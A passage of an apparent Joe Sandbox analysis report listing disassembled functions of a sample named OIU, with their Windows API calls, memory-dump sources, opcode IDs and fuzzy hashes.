                                                                      • Instruction Fuzzy Hash: 42A1C071604300AFD720EF24D882F2AB7E1AF84714F14885DF56A9B792DBB1ED41CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                                      • _free.LIBCMT ref: 00BDBB7F
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDBD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID:
                                                                      • API String ID: 1286116820-0
                                                                      • Opcode ID: 0ae9526a324be5ee17c3e3c0135b7007021383460eb1fbc49fb57b7989f49946
                                                                      • Instruction ID: 42f9f33a9b06a000ba71df321c878b18575ea0397b4816ec2e255f654a7d8d76
                                                                      • Opcode Fuzzy Hash: 0ae9526a324be5ee17c3e3c0135b7007021383460eb1fbc49fb57b7989f49946
                                                                      • Instruction Fuzzy Hash: 7B518371900209EFCB14EF699C81EAEF7F8EB44360B1542ABE554D73A1FB709E419B50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C0CF22,?), ref: 00C0DDFD
                                                                        • Part of subcall function 00C0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C0CF22,?), ref: 00C0DE16
                                                                        • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C0E473
                                                                      • MoveFileW.KERNEL32 ref: 00C0E4AC
                                                                      • _wcslen.LIBCMT ref: 00C0E5EB
                                                                      • _wcslen.LIBCMT ref: 00C0E603
                                                                      • SHFileOperationW.SHELL32 ref: 00C0E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3183298772-0
                                                                      • Opcode ID: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                                      • Instruction ID: 3dd351c89d4c3fda18f6d7394e5d80f4f6795570a7ccf22735d4cf112026ac24
                                                                      • Opcode Fuzzy Hash: f177c16cb1ae0a02e39134d0052ffe3077d9bee107c263cb732cf43d8635a908
                                                                      • Instruction Fuzzy Hash: 405161B24483459BC724EB90DC81ADFB3ECAF85340F00491EF69993191EF75A688CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BAA5
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2BB00
                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C2BB63
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2BBA6
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2BBB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 826366716-0
                                                                      • Opcode ID: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                                      • Instruction ID: 23510d5d3c1d72c88e8ddd57f4af192083a82c15327f6b1d5a28919e3149d27c
                                                                      • Opcode Fuzzy Hash: c2c3986cadbe19886f8fe7be5b75b12ec0412cfde9d5819c326c055fd302acb7
                                                                      • Instruction Fuzzy Hash: 1361B031208241EFC314DF14D490E2ABBE5FF85348F1485ACF49A8B6A2DB31ED45DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C08BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00C08BCD
                                                                      • VariantClear.OLEAUT32 ref: 00C08C3E
                                                                      • VariantClear.OLEAUT32 ref: 00C08C9D
                                                                      • VariantClear.OLEAUT32(?), ref: 00C08D10
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C08D3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                                      • Instruction ID: ae8777d73348bca973f0728e8f41807a3f53e6a7dbdae283cb2d5bd2c8c7449b
                                                                      • Opcode Fuzzy Hash: 0b895080b06b92aa86f6758f427cbfb15b9b2e85ed9d5cfccaf85d4bcbe45c00
                                                                      • Instruction Fuzzy Hash: CE517AB5A1021AEFCB10CF68C884AAAB7F8FF89310B158559F955EB350E730E911CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C18AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 00C18BAE
                                                                      • GetPrivateProfileSectionW.KERNEL32 ref: 00C18BDA
                                                                      • WritePrivateProfileSectionW.KERNEL32 ref: 00C18C32
                                                                      • WritePrivateProfileStringW.KERNEL32 ref: 00C18C57
                                                                      • WritePrivateProfileStringW.KERNEL32 ref: 00C18C5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: e34b4c7e165ee05dd0df58ee33a1b0b87ff7a7bbe4735b54d7c937b3bd18d5f1
                                                                      • Instruction ID: 7d97ba9bc8e91108835be120f67afc7b3d8d6b00bc4f00bf4882856449132acc
                                                                      • Opcode Fuzzy Hash: e34b4c7e165ee05dd0df58ee33a1b0b87ff7a7bbe4735b54d7c937b3bd18d5f1
                                                                      • Instruction Fuzzy Hash: 21515A35A042159FCB00DF64C891AAEBBF5FF4A314F088099E849AB362CB31ED55DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C28EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C28F40
                                                                      • GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 00C28FD0
                                                                      • GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 00C28FEC
                                                                      • GetProcAddress.KERNEL32(00000000,?,00000041), ref: 00C29032
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00C29052
                                                                        • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C11043,?,759D3F18), ref: 00BBF6E6
                                                                        • Part of subcall function 00BBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BFFA64,00000000,00000000,?,?,00C11043,?,759D3F18,?,00BFFA64), ref: 00BBF70D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                                      • Instruction ID: 4bbdfd4c965fbb281edf9cc7e3e766bce25869a58a358e86b7ab0463222b1342
                                                                      • Opcode Fuzzy Hash: 932c385078e70106ea82b5757859a7b42910caf59e0e52070c259e22bcf15b2c
                                                                      • Instruction Fuzzy Hash: B8514935A05215DFC711DF58C4949ADBBF1FF49314F0880A9E81AAB762DB31EE85CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C36B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowLongW.USER32 ref: 00C36C33
                                                                      • SetWindowLongW.USER32 ref: 00C36C4A
                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C36C73
                                                                      • ShowWindow.USER32(00000002,00000000), ref: 00C36C98
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 00C36CC7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MessageSendShow
                                                                      • String ID:
                                                                      • API String ID: 3688381893-0
                                                                      • Opcode ID: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                                      • Instruction ID: d29d0175dcbba94f2fcffd60ce5d4dec0e581a295c721dae83350f637d0a5083
                                                                      • Opcode Fuzzy Hash: fe743b21fa6228a5191cf3c5af8aaea981353c5034a71f52ec51b93bd6e46323
                                                                      • Instruction Fuzzy Hash: 98410A35624104BFDB24CF38DC95FA9BBA4EB09350F149224FCA5A72E0C371EE41DA50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 06d955b5d9a4e28918f262dcd76b08b74bb64fb3ac650b875155be5277a1555f
                                                                      • Instruction ID: 3eb8defb9e83ea9b3ebb098a7f3487898da65327011d300195c3a460de0d47e5
                                                                      • Opcode Fuzzy Hash: 06d955b5d9a4e28918f262dcd76b08b74bb64fb3ac650b875155be5277a1555f
                                                                      • Instruction Fuzzy Hash: 3F41A136A00240AFCB24DF78C881A6DF7E5EF99314B1585AAE515EB351E631AD01DB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C13874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetInputState.USER32 ref: 00C138CB
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C13922
                                                                      • TranslateMessage.USER32(?), ref: 00C1394B
                                                                      • DispatchMessageW.USER32(?), ref: 00C13955
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                                      • Instruction ID: 92a4780192c8a45003f5b09d9717ee20feac7750b2f0b35fc9d39e12af9ada62
                                                                      • Opcode Fuzzy Hash: aab3c8410ad2f6dbdd913326f501d850244ac2e9b4b43c12664aeb921e035794
                                                                      • Instruction Fuzzy Hash: 2F31A6705043C19EEB35CB359849BFA3BA8AB07318F08456AE876961E0E3B497C5EB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C1CF38
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00C1CF6F
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFB4
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFC8
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C1C21E,00000000), ref: 00C1CFF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 3191363074-0
                                                                      • Opcode ID: b080d513108c19bfd5042908e1db7cc9b925de73358a4c327c3f3476840918c9
                                                                      • Instruction ID: 4e854cecbdbcb5af1774b1c20bf106fdfcec5a133fa0695001a9408a8a05246c
                                                                      • Opcode Fuzzy Hash: b080d513108c19bfd5042908e1db7cc9b925de73358a4c327c3f3476840918c9
                                                                      • Instruction Fuzzy Hash: 88313A71540205AFDB20DFA5C8C4AEFBBF9EB16350B10446EF526E2150DB30EE82AB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C01901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 23a914c890bd8451dfeaa0e07a0df7973612266432dd9ffa1ee9b3d1eeb4ea02
                                                                      • Instruction ID: bacca62646479a4df96ab9028fc278cd09d227cb580f4cfc0225b976a35d5b4e
                                                                      • Opcode Fuzzy Hash: 23a914c890bd8451dfeaa0e07a0df7973612266432dd9ffa1ee9b3d1eeb4ea02
                                                                      • Instruction Fuzzy Hash: B331C071A10219EFCB00CFA8CD99BDE7BB5EB05315F144229FD21A72D1C7709A54DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C35706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C35745
                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C3579D
                                                                      • _wcslen.LIBCMT ref: 00C357AF
                                                                      • _wcslen.LIBCMT ref: 00C357BA
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C35816
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_wcslen
                                                                      • String ID:
                                                                      • API String ID: 763830540-0
                                                                      • Opcode ID: 616cf8251dba92bae86e24b47501a4b3834e3f5340f280b4d31718363ecf42fa
                                                                      • Instruction ID: 784cf78b486569f930907c4177b2994d61c09e912a0b424644070fcbcbbf6272
                                                                      • Opcode Fuzzy Hash: 616cf8251dba92bae86e24b47501a4b3834e3f5340f280b4d31718363ecf42fa
                                                                      • Instruction Fuzzy Hash: 082180759246189ADB209FA5CC85BEE7BB8FF05724F108256F929EA1C0D7708A85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C20930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00C20951
                                                                      • GetForegroundWindow.USER32 ref: 00C20968
                                                                      • GetDC.USER32(00000000), ref: 00C209A4
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00C209B0
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00C209E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 11afa4819ab2a5feb5c8e3c2ac6b33718172633854ed1a951b2291ff4566d004
                                                                      • Instruction ID: 0e6bf201c946550ba1dbea22d6765c8ba7da533e814003981ef01eb4b12ea977
                                                                      • Opcode Fuzzy Hash: 11afa4819ab2a5feb5c8e3c2ac6b33718172633854ed1a951b2291ff4566d004
                                                                      • Instruction Fuzzy Hash: D821CD35A00214AFD704EF65D889BAEBBF9EF49300F048069F85AA7762CB30AC44DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00BDCDC6
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDCDE9
